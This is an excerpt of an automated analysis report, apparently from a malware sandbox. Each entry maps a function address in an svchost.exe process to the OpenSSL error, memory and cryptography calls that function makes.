Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D3C40 ERR_clear_error,ERR_new,ERR_set_debug,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,SetLastError,BIO_read,BIO_ADDR_new,BIO_ctrl,BIO_ctrl,BIO_ADDR_free,BIO_write,BIO_ctrl,BIO_test_flags,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_ctrl,BIO_ADDR_clear,BIO_write,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_test_flags,BIO_ADDR_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error, 28_2_00007FF8A92D3C40
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9323C30 CRYPTO_zalloc,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A9323C30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9349CC1 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_CTX_copy_ex,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy, 28_2_00007FF8A9349CC1
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933FC90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug, 28_2_00007FF8A933FC90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9349CAA ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free, 28_2_00007FF8A9349CAA
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F9CC0 EVP_MAC_CTX_free,CRYPTO_free, 28_2_00007FF8A92F9CC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930FCB0 CRYPTO_free, 28_2_00007FF8A930FCB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9349B4A memset,CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 28_2_00007FF8A9349B4A
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931BB00 CRYPTO_free, 28_2_00007FF8A931BB00
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F7B50 EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,ERR_new,ERR_set_debug,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug, 28_2_00007FF8A92F7B50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9349B33 EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestVerify,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free, 28_2_00007FF8A9349B33
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D7BEE CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A92D7BEE
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D1BE0 CRYPTO_zalloc, 28_2_00007FF8A92D1BE0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DDE10 i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92DDE10
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9309E60 OPENSSL_LH_free,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free, 28_2_00007FF8A9309E60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F9E00 CRYPTO_zalloc,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free, 28_2_00007FF8A92F9E00
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9311E70 CRYPTO_realloc, 28_2_00007FF8A9311E70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9323E10 CRYPTO_malloc,CRYPTO_free, 28_2_00007FF8A9323E10
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F3E50 CRYPTO_free,CRYPTO_memdup, 28_2_00007FF8A92F3E50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9325E20 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error, 28_2_00007FF8A9325E20
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9327EC0 CRYPTO_zalloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error, 28_2_00007FF8A9327EC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FDEA0 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free, 28_2_00007FF8A92FDEA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9345E80 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,memcpy,EVP_MD_get0_name,EVP_MD_is_a,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug, 28_2_00007FF8A9345E80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9337E90 CRYPTO_malloc,COMP_expand_block, 28_2_00007FF8A9337E90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D1EC0 CRYPTO_free, 28_2_00007FF8A92D1EC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931BD60 CRYPTO_zalloc, 28_2_00007FF8A931BD60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F3D70 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free, 28_2_00007FF8A92F3D70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9325D30 CRYPTO_free, 28_2_00007FF8A9325D30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D5DB0 CRYPTO_malloc, 28_2_00007FF8A92D5DB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D7DA0 CRYPTO_free, 28_2_00007FF8A92D7DA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933DDE0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug, 28_2_00007FF8A933DDE0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9349DA6 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free, 28_2_00007FF8A9349DA6
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934BDB0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_is_a,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free, 28_2_00007FF8A934BDB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FA030 OSSL_PROVIDER_do_all,CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid, 28_2_00007FF8A92FA030
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9340070 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug, 28_2_00007FF8A9340070
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9312000 CRYPTO_free, 28_2_00007FF8A9312000
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F4060 CRYPTO_free,CRYPTO_memdup, 28_2_00007FF8A92F4060
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9310010 CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_free, 28_2_00007FF8A9310010
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931C0D0 CRYPTO_free, 28_2_00007FF8A931C0D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E40E0 CRYPTO_get_ex_data, 28_2_00007FF8A92E40E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93040E0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free, 28_2_00007FF8A93040E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F9F30 OSSL_PROVIDER_do_all,CRYPTO_malloc,memcpy, 28_2_00007FF8A92F9F30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F3F00 CRYPTO_free,CRYPTO_strdup, 28_2_00007FF8A92F3F00
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DDF70 CRYPTO_malloc,BIO_snprintf, 28_2_00007FF8A92DDF70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9341F30 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A9341F30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9305FA0 CRYPTO_realloc, 28_2_00007FF8A9305FA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931FFD0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A931FFD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D9F90 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse, 28_2_00007FF8A92D9F90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9337FE0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_mark,ERR_clear_last_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 28_2_00007FF8A9337FE0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DBFF0 CRYPTO_THREAD_run_once, 28_2_00007FF8A92DBFF0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935BFA0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,EVP_PKEY_derive_set_peer,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free, 28_2_00007FF8A935BFA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D321D X509_VERIFY_PARAM_get0_peername,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,X509_VERIFY_PARAM_get0_peername,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init, 28_2_00007FF8A92D321D
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F1210 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free, 28_2_00007FF8A92F1210
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9323200 OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_delete,CRYPTO_free, 28_2_00007FF8A9323200
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9313220 CRYPTO_zalloc,CRYPTO_free, 28_2_00007FF8A9313220
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D5240 CRYPTO_zalloc,CRYPTO_free, 28_2_00007FF8A92D5240
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930B2D0 CRYPTO_free, 28_2_00007FF8A930B2D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F92F0 CRYPTO_realloc,memcpy, 28_2_00007FF8A92F92F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931F290 CRYPTO_realloc, 28_2_00007FF8A931F290
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93592A0 EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A93592A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F32C0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock, 28_2_00007FF8A92F32C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934B140 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_size,ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free, 28_2_00007FF8A934B140
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E9120 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock, 28_2_00007FF8A92E9120
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930D100 CRYPTO_free, 28_2_00007FF8A930D100
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9321127 CRYPTO_realloc, 28_2_00007FF8A9321127
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FD140 CRYPTO_free,CRYPTO_malloc, 28_2_00007FF8A92FD140
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93251D0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,ERR_new,ERR_set_debug,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_MD_up_ref,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_free,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,CRYPTO_free, 28_2_00007FF8A93251D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93051E0 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free, 28_2_00007FF8A93051E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9325190 BIO_free,CRYPTO_free, 28_2_00007FF8A9325190
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933B420 CRYPTO_free, 28_2_00007FF8A933B420
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FD440 CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,CONF_parse_list,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92FD440
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9341430 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug, 28_2_00007FF8A9341430
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933D4E0 ERR_new,ERR_set_debug,CRYPTO_free, 28_2_00007FF8A933D4E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93474E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A93474E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F34E0 CRYPTO_THREAD_write_lock,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free, 28_2_00007FF8A92F34E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933B4A0 CRYPTO_free,CRYPTO_free, 28_2_00007FF8A933B4A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930B4B0 CRYPTO_zalloc, 28_2_00007FF8A930B4B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FD310 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92FD310
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9355360 ERR_new,i2d_PUBKEY,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free, 28_2_00007FF8A9355360
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934B370 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,RAND_bytes_ex,EVP_MD_CTX_new,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free, 28_2_00007FF8A934B370
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DD360 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free, 28_2_00007FF8A92DD360
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E7360 CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free, 28_2_00007FF8A92E7360
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D13A0 CRYPTO_free, 28_2_00007FF8A92D13A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9323380 CRYPTO_free, 28_2_00007FF8A9323380
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93493A0 ERR_new,ERR_set_debug,CRYPTO_clear_free, 28_2_00007FF8A93493A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9351650 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A9351650
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F3650 CRYPTO_THREAD_unlock, 28_2_00007FF8A92F3650
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9339620 CRYPTO_malloc,ERR_new,ERR_set_debug, 28_2_00007FF8A9339620
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93236D0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A93236D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93376D0 CRYPTO_free, 28_2_00007FF8A93376D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934B6E0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,RAND_bytes_ex,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_CTX_ctrl,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug, 28_2_00007FF8A934B6E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92ED68B X509_VERIFY_PARAM_free,BIO_pop,BIO_free,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,OSSL_STACK_OF_X509_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,BIO_free_all,BIO_free_all,CRYPTO_free, 28_2_00007FF8A92ED68B
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93056D0 CRYPTO_zalloc, 28_2_00007FF8A93056D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D36C0 X509_VERIFY_PARAM_get0_peername,BIO_get_shutdown,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free, 28_2_00007FF8A92D36C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93416B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 28_2_00007FF8A93416B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9339540 OPENSSL_cleanse,CRYPTO_free, 28_2_00007FF8A9339540
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935B550 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A935B550
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DB500 CRYPTO_free, 28_2_00007FF8A92DB500
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E5500 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup, 28_2_00007FF8A92E5500
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F5550 CRYPTO_malloc,CRYPTO_new_ex_data,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,ERR_new,ERR_set_debug,ERR_set_error,X509_chain_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup, 28_2_00007FF8A92F5550
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F75B0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free, 28_2_00007FF8A92F75B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93275D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A93275D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D9590 CRYPTO_free,CRYPTO_memdup, 28_2_00007FF8A92D9590
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933B5E0 CRYPTO_free, 28_2_00007FF8A933B5E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930B5F0 CRYPTO_free, 28_2_00007FF8A930B5F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933D5F0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new, 28_2_00007FF8A933D5F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933B590 CRYPTO_free, 28_2_00007FF8A933B590
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D15D0 CRYPTO_free, 28_2_00007FF8A92D15D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93395A0 CRYPTO_free, 28_2_00007FF8A93395A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D35C8 CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags, 28_2_00007FF8A92D35C8
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E3820 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,CRYPTO_realloc, 28_2_00007FF8A92E3820
